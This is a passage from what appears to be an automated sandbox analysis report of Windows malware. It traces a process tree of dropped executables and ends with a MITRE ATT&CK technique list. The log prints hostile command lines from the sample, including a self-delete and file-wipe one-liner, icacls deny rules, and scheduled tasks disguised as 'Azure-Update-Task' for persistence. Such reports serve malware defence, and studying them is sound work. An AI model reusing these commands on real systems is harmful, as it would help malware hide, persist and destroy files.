        6⤵
        
        PID:5012
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        7⤵
        Kills process with taskkill
        
        PID:3940
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun15223697c98.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2748
    - - C:\Users\Admin\AppData\Local\Temp\7zS44375AD4\Sun15223697c98.exe
        
        Sun15223697c98.exe
        5⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:1840
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun157a449716c8ee483.exe /mixone
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3972
    - - C:\Users\Admin\AppData\Local\Temp\7zS44375AD4\Sun157a449716c8ee483.exe
        
        Sun157a449716c8ee483.exe /mixone
        5⤵
        Executes dropped EXE
        
        PID:1632
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1632 -s 656
        6⤵
        Drops file in Windows directory
        Program crash
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1612
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1632 -s 672
        6⤵
        Program crash
        
        PID:4668
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1632 -s 632
        6⤵
        Program crash
        
        PID:4700
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1632 -s 632
        6⤵
        Program crash
        
        PID:4116
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1632 -s 912
        6⤵
        Program crash
        
        PID:3104
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1632 -s 936
        6⤵
        Program crash
        
        PID:5248
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1632 -s 1096
        6⤵
        Suspicious use of NtCreateProcessExOtherParentProcess
        Program crash
        
        PID:5428

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s BITS
1⤵
- Suspicious use of SetThreadContext
PID:2724
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k SystemNetworkService
  2⤵
  - Drops file in System32 directory
  - Checks processor information in registry
  - Modifies data under HKEY_USERS
  - Modifies registry class
  PID:768

C:\Users\Admin\AppData\Local\Temp\is-ACPBP.tmp\setup_2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-ACPBP.tmp\setup_2.tmp" /SL5="$201E6,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5052
- C:\Users\Admin\AppData\Local\Temp\setup_2.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4668
- - C:\Users\Admin\AppData\Local\Temp\is-FO3MH.tmp\setup_2.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-FO3MH.tmp\setup_2.tmp" /SL5="$20202,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5024

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:3480
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  - Modifies registry class
  PID:4948

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:3684
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  PID:3988

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:720

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:4628

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4516

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
PID:6204
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding C1C778C845CA751C8CA2D359AF3E9A74 C
  2⤵
  - Loads dropped DLL
  PID:6508
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding A5AA45D8AC49C9FEB47CB3A2AACC5BDB
  2⤵
  - Blocklisted process makes network request
  - Loads dropped DLL
  PID:6268
- - C:\Windows\SysWOW64\taskkill.exe
    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
    3⤵
    - Kills process with taskkill
    PID:3792
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 3CD48DFD757335FB9DFD54FC909AFD94 E Global\MSI0000
  2⤵
  PID:5256

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:6416

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:6004
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  PID:6088

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:7112

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:5296

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:2688

C:\Users\Admin\AppData\Local\Temp\3370.exe
C:\Users\Admin\AppData\Local\Temp\3370.exe
1⤵
- Executes dropped EXE
PID:5496

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Loads dropped DLL
- Modifies registry class
PID:5256

C:\Users\Admin\AppData\Local\Temp\5E69.exe
C:\Users\Admin\AppData\Local\Temp\5E69.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4544
- C:\Users\Admin\AppData\Local\Temp\5E69.exe
  C:\Users\Admin\AppData\Local\Temp\5E69.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:1160
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Users\Admin\AppData\Local\25eb2d70-8e4b-4053-8e92-2f671145a411" /deny *S-1-1-0:(OI)(CI)(DE,DC)
    3⤵
    - Modifies file permissions
    PID:5148
- - C:\Users\Admin\AppData\Local\Temp\5E69.exe
    "C:\Users\Admin\AppData\Local\Temp\5E69.exe" --Admin IsNotAutoStart IsNotTask
    3⤵
    PID:4808
  - - C:\Users\Admin\AppData\Local\Temp\5E69.exe
      "C:\Users\Admin\AppData\Local\Temp\5E69.exe" --Admin IsNotAutoStart IsNotTask
      4⤵
      Modifies extensions of user files
      PID:5536
    - - C:\Users\Admin\AppData\Local\cecd8eb8-cc3c-47ea-bc09-2286d081dbb4\build2.exe
        
        "C:\Users\Admin\AppData\Local\cecd8eb8-cc3c-47ea-bc09-2286d081dbb4\build2.exe"
        5⤵
        Suspicious use of SetThreadContext
        
        PID:5012
      - C:\Users\Admin\AppData\Local\cecd8eb8-cc3c-47ea-bc09-2286d081dbb4\build2.exe
        
        "C:\Users\Admin\AppData\Local\cecd8eb8-cc3c-47ea-bc09-2286d081dbb4\build2.exe"
        6⤵
        Loads dropped DLL
        Checks processor information in registry
        
        PID:5244
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\cecd8eb8-cc3c-47ea-bc09-2286d081dbb4\build2.exe" & del C:\ProgramData\*.dll & exit
        7⤵
        
        PID:6712
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im build2.exe /f
        8⤵
        Suspicious use of SetThreadContext
        Kills process with taskkill
        
        PID:4808
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        8⤵
        Delays execution with timeout.exe
        
        PID:6260
    - - C:\Users\Admin\AppData\Local\cecd8eb8-cc3c-47ea-bc09-2286d081dbb4\build3.exe
        
        "C:\Users\Admin\AppData\Local\cecd8eb8-cc3c-47ea-bc09-2286d081dbb4\build3.exe"
        5⤵
        Suspicious use of SetThreadContext
        
        PID:5376
      - C:\Users\Admin\AppData\Local\cecd8eb8-cc3c-47ea-bc09-2286d081dbb4\build3.exe
        
        "C:\Users\Admin\AppData\Local\cecd8eb8-cc3c-47ea-bc09-2286d081dbb4\build3.exe"
        6⤵
        
        PID:3116
        
        C:\Windows\SysWOW64\schtasks.exe
        
        /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
        7⤵
        Creates scheduled task(s)
        
        PID:5616

C:\Users\Admin\AppData\Local\Temp\80C7.exe
C:\Users\Admin\AppData\Local\Temp\80C7.exe
1⤵
- Loads dropped DLL
PID:4884
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\80C7.exe"
  2⤵
  PID:6060
- - C:\Windows\SysWOW64\timeout.exe
    timeout /T 10 /NOBREAK
    3⤵
    - Delays execution with timeout.exe
    PID:4564
- C:\Users\Admin\AppData\Local\Temp\him1sDVubH.exe
  "C:\Users\Admin\AppData\Local\Temp\him1sDVubH.exe"
  2⤵
  PID:2412
- - C:\Windows\SysWOW64\schtasks.exe
    /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe"
    3⤵
    - Creates scheduled task(s)
    PID:5220

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6468

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:6808

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4560

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:7156

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6320

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:888

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4284

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:7040

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:5900

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:6380

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6684

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:6636

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:3020

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:6484

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:2852

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

File and Directory Permissions Modification

T1222

Hidden Files and Directories

T1158

Install Root Certificate

T1130

Modify Registry

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Software Discovery

T1518

System Information Discovery